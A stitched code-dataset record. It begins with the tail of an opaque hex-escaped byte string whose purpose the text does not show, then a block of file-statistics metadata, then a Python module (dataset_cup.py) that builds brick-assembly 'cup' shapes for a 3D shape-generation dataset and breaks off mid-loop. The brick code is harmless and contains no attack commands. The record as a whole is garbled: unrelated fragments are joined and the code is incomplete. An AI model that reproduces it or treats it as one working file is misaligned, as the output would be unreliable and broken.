x4e\x39\x5a\xcd\xda\xf6\xb8\xf0\xc8\x75\x39\xdb\x53\x8c\xbb\xf2\x0e\xda\x9d\xe8\x5d\x43\x76\xf9\xcf\xca\xb3\x77\x93\xb0\x3e\x8d\x10\x51\xa5\xb8\x83\xc4\x10\x74\xdc\x82\x03\x41\xec\x3a\x2e\x5e\x80\x85\x34\x2f\x40\x72\xdd\x91\xea\xac\x74\x9d\xd9\xe5\xd4\xb0\x4f\x41\xa6\x52\x38\xea\x51\xa6\x5e\x0e\x28\x7e\x1f\x36\xdd\xd2\xd4\x26\xdc\x4b\x88\x06\x5b\x51\xa1\x46\x95\x51\xb7\xb2\xb6\x2f\x46\xa2\xef\x6e\x93\x9b\x81\x57\x31\xbe\x69\xed\x8b\x7f\x82\xa5\xa0\x6c\x53\x70\x50\x77\x5d\x8e\x5d\x21\x65\x85\x91\xe0\x74\x09\x7c\xd6\x0c\xf5\x2b\xbb\x64\x1c\x0f\x01\x1d\x17\x03\x27\xdf\xfa\x49\xe9\xcc\x75\xeb\xfd\x91\x93\x32\x1d\x66\x69\xb1\xe5\x0d\x4d\x69\xfb\x97\x6b\x83\x10\x37\x70\xd2\xef\x96\xa9\x40\xdb\xd2\x45\x48\xd5\x40\x0a\x8f\x6c\xbd\x0e\x53\x26\x4e\xed\x3b\xa9\x0a\x67\x52\x66\xee\xf3\x41\xc1\x82\xad\xee\xf8\x4e\xa6\x12\x1d\xf5\xb5\xe9\x2d\xb6\xac\x4b\x0f\x13\xe9\x33\xf7\xbf\xbd\xd3\x6f\xd1\x05\xc9\x3c\x46\x0d\x62\x71\x29\x1b\xae\x70\x50\x05\xc6\x05\x3b\x74\x47\x56\xa4\x68\x3e\x36\x5b\xc9\x1d\x2f\xbc\xe0\x81\xfd\x8f\xc9\x7c\x65\x26\xc2\x2d\x84\x91\xc5\x52\xa9\xe8\x7a\x0d\x79\x3b\xe4\x37\x6f\xd5\x87\x17\x58\x34\xe1\x97\xc2\xbc\x09\xbd\xdc\xcc\xe3\xa5\xe7\x38\x2f\x95\x79\x55\x6e\xaf\x6f\x89\x14\xaa\x37\xbc\x3b\xf2\x64\x06\x56\xc1\xba\xb0\x6a\xb3\xcd\x90\x29\x31\xdb\x12\x6c\x6a\x84\xd4\xc4\x98\x0a\xac\xbf\x55\x24\xc5\x69\x51\xba\xbd\x4c\x3d\xae\x66\x83\x6a\xef\x2f\xf5\x08\x4e\x16\x92\xf5\xa1\xd6\xe3\xf1\x4e\xf0\x6d\x2f\x7a\xa9\x98\x67\x55\x3e\xfd\x41\xfe\x98\xa7\x24\x1e\x56\x8c\x97\x1a\x4d\x8b\xb1\x06\x64\x72\x09\x92\xa2\x0c\x17\x36\x1f\x38\x5c\x64\x94\x70\x15\xad\xc5\x9d\x9e\x64\x74\x2c\x81\x1b\x19\xe5\x2a\x99\xce\xd4\x0b\x13\x2a\x58\x81\xd0\x6b\xe8\xf6\x7f\xf6\xe7\x1b\xaf\x43\x42\x33\x2f\x6f\x28\xed\x83\x41\xd7\x24\x34\xe4\xc0\xcf\x6b\xb7\xfe\xa8\x9f\x10\x86\x11\x43\xd3\xf5\xf9\x05\xc1\xf6\x36\xd0\x24\xd1\xee\x0d\xd6\xea\x35\xc1\x2d\x1a\x68\xe8\xe5\x19\xdc\xe0\xc2\x2d\x12\x60\xf4\xa6\x08\x70\x56\x84\x82\x2c\x61\x07\x42\xf5\x93\x1b\x3f\x37\x22\xa3\x81\x34\x8c\x02\x83\x00\x11\x80\x5b\x04\x62\x32\xf5\x9e\x69\xbc\x94\xf3\x16\x9d\x32\x37\xe8\xa5\x1d\x55\x3c\xa7\x33\x96\xeb\xde\x45\x71\xfd\x29\x80\x58\x4c\xf3\x8b\xb8\x00\x20\x27\x2e\x8c\x81\x7c\x1d\x03\x1a\x58\x0c\x0b\x46\xa0\x1b\x47\x5f\x2c\x2e\xf0\x30\x9c\xd1\x52\x0f\x8a\xc1\xbc\xcf\x16\x57\x42\x98\xdf\x7c\x5b\xad\xcf\x26\x3f\x46\xf0\x36\x79\xbf\x15\x94\xc4\x4e\x44\x19\x1a\xb6\x47\xab\x01\x63\x4e\x41\x77\xa3\x38\x31\xb9\x30\xd3\x4a\x97\xe7\x19\xff\x11\x7d\x25\xb5\x46\x83\x5f\x79\x53\xca\x75\x5b\xc2\x11\x7f\x2f\xf5\x8e\x37\x4c\x3a\xf4\x7d\xb1\x34\x3f\x29\x1a\xa5\x1f\xe5\x54\x5d\xdc\x91\x81\x3a\x73\x19\xbc\xc0\xc4\x15\x12\x93\x71\x90\xdf\x20\xa8\xef\xdf\x5a\x73\x83\x89\xc5\x17\x7f\xd9\x20\x29\x00\xed\x5c\xec\x77\xa4\x4d\x4b\x9b\x0a\x49\x70\xa3\xcf\x9a\xb6\xa9\x62\xc1\x0c\x03\x60\xcb\x87\x74\x04\x5e\xa1\x78\xd1\xa3\x48\x2f\xe3\x64\xd2\x55\x3d\x7d\x24\x96\xfe\x37\x60\x32\x02\x67\xf5\x88\x83\x7f\x5e\xe6\x0b\x9f\x7c\xad\x92\x78\x69\x37\xdf\x30\x7d\xe2\xcb\xef\x88\xed\x2c\x85\x79\x53\x88\x7e\x7c\xf6\x23\x77\xb1\xee\xf0\xcf\x01\x3e\x8c\x57\x0a\xff\xb2\x8e\x8e\x4e\x47\x26\xc1\x98\x68\xeb\xf8\x8c\xe9\x9b\x32\xb0\x34\xd2\x24\x73\x35\x86\x30\x4f\x6f\x5e\x09\x10\x8a\xac\xd1\xc7\x31\xad\x0d\xa1\x16\x75\x29\x46\x4a\x76\x61\xee\x30\x60\x3b\x86\x1a\xf0\xad\xc0\x75\x19\xc4\x4d\x72\x63\x49\xf9\x47\x27\xe1\x44\x71\x71\x72\xad\xa7\x5b\x02\xc9\x6f\x5d\x4b\xdf\x92\x31\x99\xe8\xc8\x5a\x29\xce\x35\x23\x50\xf6\x2b\x5d\x00\xd8\x63\x4c\x07\x42\x49\xe1\xe2\x11\x47\xae\x5e\xf3\xdc\xc1\x70\x50\x4d\x79\xed\x31\xa3\x06\xf6\x05\xd2\xf5\xd0\x71\x6b\x1a\x23\x09\x8d\xc2\xd0\xda\x50\x94\x47\x42\x2b\x9b\x80\x11\xed\x3d\x95\x83\x56\xf7\x0f\x73\x2e\x49\x5b\x22\xbd\xe1\x3d\xac\x30\xdd\x45\x00\xb4\xa0\x90\x0e\x7f\xbd\x3f\xc6\x1f\xd1\x81\x21\x55\x20\xf3\x0d\x1e\x0d\x83\x5f\x30\x87\x6e\xc0\xfb\xf9\x78\x28\xe2\xa0\xa7\x36\x86\xe0\x59\xb4\x90\xa1\xe4\xda\x7e\x95\x55\x06\xf6\xc8\xa0\xe5\x2a\xb2\x91\x76\x25\x11\x9d\xf5\xc3\x8c\xd3\xfc\x9a\x45\x2e\x3f\x71\x12\x8a\x8f\x28\x44\xc1\xab\x4c\x84\x06\x9e\xf7\x0b\xfd\x74\xd5\x9d\x06\xa5\xa5\x48\xa3\x8a\xe0\x5d\x89\x0f\x56\x02\x85\x8d\x9d\x63\x6c\x85\x59\x8d\x6d\xaa\xe2\xe7\xeb\xa2\xc4\xfb\x9d\x91\xfa\x25\xfb\x4c\xe7\xc1\x7e\x6f\x08\xe9\x25\x0d\x37\xc9\xa0\x4f\xb1\xd7\x90\x99\xf4\x5e\x2c\x74\xc7\x32\x64\xcd\xac\x6a\x67\xe9\x08\x1a\x42\x65\x64\xc9\x71\x8c\xf7\x22\x64\x88\x49\x06\xd6\x33\x81\xa4\xc9\x0c\x72\xb0\x87\x66\x11\x5e\xa3\xa8\x0d\x18\xd3\x30\x25\x39\x94\x04\xe5\xca\x2b\x9d\x15\xd4\xd2\x46\x9b\x07\x9e\x22\x94\x4b\xc6\x34\x9a\xbe\xc6\x20\x68\x25\x52\x6a\xba\xf5\x49\x4b\x45\x85\xa7\xea\x99\x33\x3c\x68\x72\xe8\x4f\x7b\x17\xb4\xa3\x89\xbf\x85\xae\xbc\x96\x67\xf7\x01\x84\x53\x94\xcd\xf1\xee\xa4\xf4\xa9\xf5\x90\xcf\xb0\x59\x6a\xcf\xe4\x30\xb7\x32\xf1\x45\x61\x12\xf2\xd4\xbd\x51\x7b\x08\x8e\x3c\x7d\x5f\x42\x25\xfc\x7a\xfd\x8f\x72\xb7\x12\x4e\x37\x92\xf3\xe9\x02\x38\xee\x3d\xd5\x4c\x5e\xce\x66\x48\xb6\xed\x46\x18\xe8\x9e\x0f\x1e\x38\xd2\x60\xd9\x80\xc6\x1a\xde\x56\x4d\x4f\x7e\xce\x12\xad\x8f\xd3\x6d\xf6\x84\x28\x6f\x93\xf8\x4f\x66\x9a\x8f\x9c\xfd\xc2\xe0\x6d\x30\x05\xce\xa6\x27\x20\x1d\x32\x52\x89\x16\xe4\x97\xed\x81\x2b\x2b\x83\x04\x54\xcd\x43\xe2\x5f\x39\xd9\x7a\x8d\x31\xad\x68\xde\x4b\xa1\x17\x4e\x98\x15\x2b\xc3\xce\x31\xd3\x11\xfa\x1e\x4a\xd6\xdf\x12\x56\x57\x51\x07\x0b\x64\x40\x2b\x94\x29\xd4\x51\x51\xe4\x21\x46\x33\x2c\x7d\x81\xcb\xef\xeb\xb7\xcd\x8b\x28\xb2\x06\x46\xed\xde\xb3\x14\x02\x62\x2f\x1b\x9a\x19\x2e\x7b\x3f\x76\x37\x14\x61\x66\x80\x41\xe6\x15\x14\x15\x18\x52\x63\xfe\xd3\x1b\xa2\xe6\x6c\x1c\x15\x76\xdf\x88\xfc\x97\x3a\x6a\x2a\x04\x44\x70\xa4\x02\xbc\x08\xee\x0d\x86\x86\xca\x87\xb5\x6e\x49\x92\x34\x60\x41\x88\xd6\xb4\xc2\x81\x89\x74\xef\xe1\xa1\x24\x80\xa2\x6a\x74\xb4\xb2\x1d\x46\x32\x39\x7d\xcd\x4d\xaa\x25\x6b\xd0\xa0\x44\x6e\x30\x87\x18\x7d\x37\x3b\xbd\x0c\x46\x3e\xb4\xd3\x37\x8b\x4c\x75\x20\x5e\xdb\x68\x9d\xf7\x39\x3a\xa7\x4c\x01\x2d\x02\x72\xc2\xb9\x3c\xd9\x20\xf9\x01\xfb\x28\xc6\x3f\xf9\xd8\xc4\x47\xbe\x90\x94\xce\x9c\x0b\xe9\x18\xce\x0f\x98\x3f\x07\x8c\x3b\x04\x65\x99\xd7\x2c\xae\x07\x9f\xf1\x87\xec\x19\xda\x2d\x4a\x49\x94\x77\x01\x10\x69\xf7\x34\xdc\x16\xb1\x8c\x0c\xb3\xe3\x5f\xc7\x17\x30\x50\xdc\x1c\xca\x4d\xdc\xf0\x28\x7c\x67\xfe\xc4\xf0\x70\x9c\x2a\xc6\x6f\xbc\x8f\x73\xca\xf2\x8d\x7c\x35\x13\x05\x52\xf5\x19\xad\xd4\xef\xcd\xee\x02\x93\xb4\x03\x0f\x0d\xee\x23\xf1\xdb\x6d\x3c\xe7\x8e\x12\x5d\xf9\x40\xda\xbd\x09\x96\xf2\x22\xdd\x60\x0e\x64\x59\xf1\xb4\xb3\xd8\x25\xc8\x7d\xb5\x56\xb7\x16\xdf\xa2\x72\xf4\x86\xce\x96\x1a\x2d\x50\x10\x79\x9c\xcf\xea\xd4\x9b\xab\xf6\xe1\x89\xa1\x64\xa2\x91\xbe\x73\x2a\x0f\xe3\xba\x8a\xd4\x81\x45\x78\x16\xd2\x8c\x19\x8a\xee\xe3\xd2\xd1\xe7\x9c\xb0\x56\x66\x4a\x89\x79\xf4\xab\xf0\x17\x62\xae', 1)
| 48,495
| 48,495
| 0.749995
| 12,119
| 48,495
| 3.000165
| 0.021536
| 0.00066
| 0.000495
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.315269
| 0.000062
| 48,495
| 1
| 48,495
| 48,495
| 0.434525
| 0
| 0
| 0
| 0
| 1
| 0.999175
| 0.999175
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
752a47d4dcab55ac47efba96726a74453078372b
| 75,662
|
py
|
Python
|
src_dataset/dataset_cup.py
|
jamesrchen/Combinatorial-3D-Shape-Generation
|
0f2dc9a4c6f5844cbce53fe4f2b7244cadf6231e
|
[
"MIT"
] | null | null | null |
src_dataset/dataset_cup.py
|
jamesrchen/Combinatorial-3D-Shape-Generation
|
0f2dc9a4c6f5844cbce53fe4f2b7244cadf6231e
|
[
"MIT"
] | null | null | null |
src_dataset/dataset_cup.py
|
jamesrchen/Combinatorial-3D-Shape-Generation
|
0f2dc9a4c6f5844cbce53fe4f2b7244cadf6231e
|
[
"MIT"
] | null | null | null |
from geometric_primitives import brick
from geometric_primitives import bricks
import dataset_common
def cup_1():
bricks_ = bricks.Bricks(40)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 1, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 3, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 5, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 6, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([2, 0, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([2, 6, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([4, 0, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([4, 6, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([6, 0, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([6, 6, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([7, 1, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([7, 5, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([7, 3, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 2 - 1, 1, 2])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 2 - 1, 5, 2])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_2():
bricks_ = bricks.Bricks(40)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 1, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 3, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 5, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 6, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([2, 0, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([2, 6, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([4, 0, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([4, 6, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([5, 1, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([5, 5, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([5, 3, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 2 - 1, 1, 2])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 2 - 1, 5, 2])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([-2, 0, i + 5])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-2, 4, i + 5])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([1, -1, i + 5])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([5, -1, i + 5])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([6, 2, i + 5])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([6, 6, i + 5])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 7, i + 5])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([3, 7, i + 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_3():
bricks_ = bricks.Bricks(100)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 4 + (i % 2 == 1)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([0,i * 2 + 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2 + 2, j * 6, 3 + (i % 2 == 0)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([5, i * 4 + 1, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4, i * 2 + 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([7, i * 2 + 2, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([9, 3, 6 + i])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([7, i * 2 + 2, 10])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([5, 3, 6 + i])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
for k in range(7):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 6, 5 + k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(6):
brick_ = brick.Brick()
brick_.set_position([-1, 3, 6 + i])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([5, 3, 11])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_4():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([-1 - (i % 2 == 1), i * 2 + 1, 4 + (i % 2 == 1)])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-2, -1, 5])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 2 - 1, 4, 4 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([8 - (i % 2 == 1), 3 - i * 2,5 - (i % 2 == 1)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([6, i * 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 2 - 1, - 2, 4 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([3, i * 4 - 1, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([0, i * 6 - 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([6, i * 6 - 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 - 1, j * 6 - 2, 6 + k])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-2, 1, 6])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-3, 1, 7])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([6, i * 4 - 1, 6])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_5():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([-1 - (i % 2 == 1), i * 2 + 1, 4 + (i % 2 == 1)])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-2, -1, 5])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(7):
brick_ = brick.Brick()
brick_.set_position([i * 2 -1, 4, 4 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([12 - (i % 2 == 1), 3 - i * 2,5 - (i % 2 == 1)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([10, i * 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
'''
brick_ = brick.Brick()
brick_.set_position([-1, -3, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
'''
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([-1 - (i % 2 == 1), -3 - i * 2, 4 + (i % 2 == 1)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([11 + (i % 2 == 1), -3 - i * 2, 4 + (i % 2 == 1)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([0, -2 - i * 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([10, -2 - i * 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(7):
brick_ = brick.Brick()
brick_.set_position([i * 2 -1, -6, 4 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2 + 3, j * 6 - 4, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2 + 3, -1, 2])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([14, i * 2 - 2, 6])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(5):
brick_ = brick.Brick()
brick_.set_position([16 - i * 4, -1, 7 + j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
for k in range(7):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 1, j * 10 - 6, 6 + k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for k in range(6):
brick_ = brick.Brick()
brick_.set_position([-2, 3 - i * 4, 6 + k])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-2 - (i % 2 == 1), 3 - i * 4, 12])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(7):
brick_ = brick.Brick()
brick_.set_position([12, i * 8 - 5, 6 + j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([14, i * 2 - 2, 12])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_6():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 3 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 2, 10, 3 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([9, 9 - i * 2, 3 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([8 - i * 2, 0, 3 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 6 + 1, j * 2 + 2, 2])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([4, i * 2 + 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(3):
for k in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 10 - 1, j * 4 + 1, 5 + k])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
for k in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 2, j * 10, 5 + k])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_7():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 3 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 2, 10, 3 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([9, 9 - i * 2, 3 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([8 - i * 2, 0, 3 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 6 + 1, j * 2 + 2, 2])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([4, i * 2 + 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4, i * 4 + 3, 2])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([0, i * 4 + 4, 5 + j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 1, 1, 5 + j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 3, 9, 5 + j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([8, i * 4 + 2, 5 + j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([9, i * 2 + 3, 7])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([12, i * 2 + 4, 8])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 3, j * 8 + 1, 7])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([0, i * 4 + 3, 7])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([0, i * 4 + 4, 8 + j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 1, 1, 8 + j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 3, 9, 8 + j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
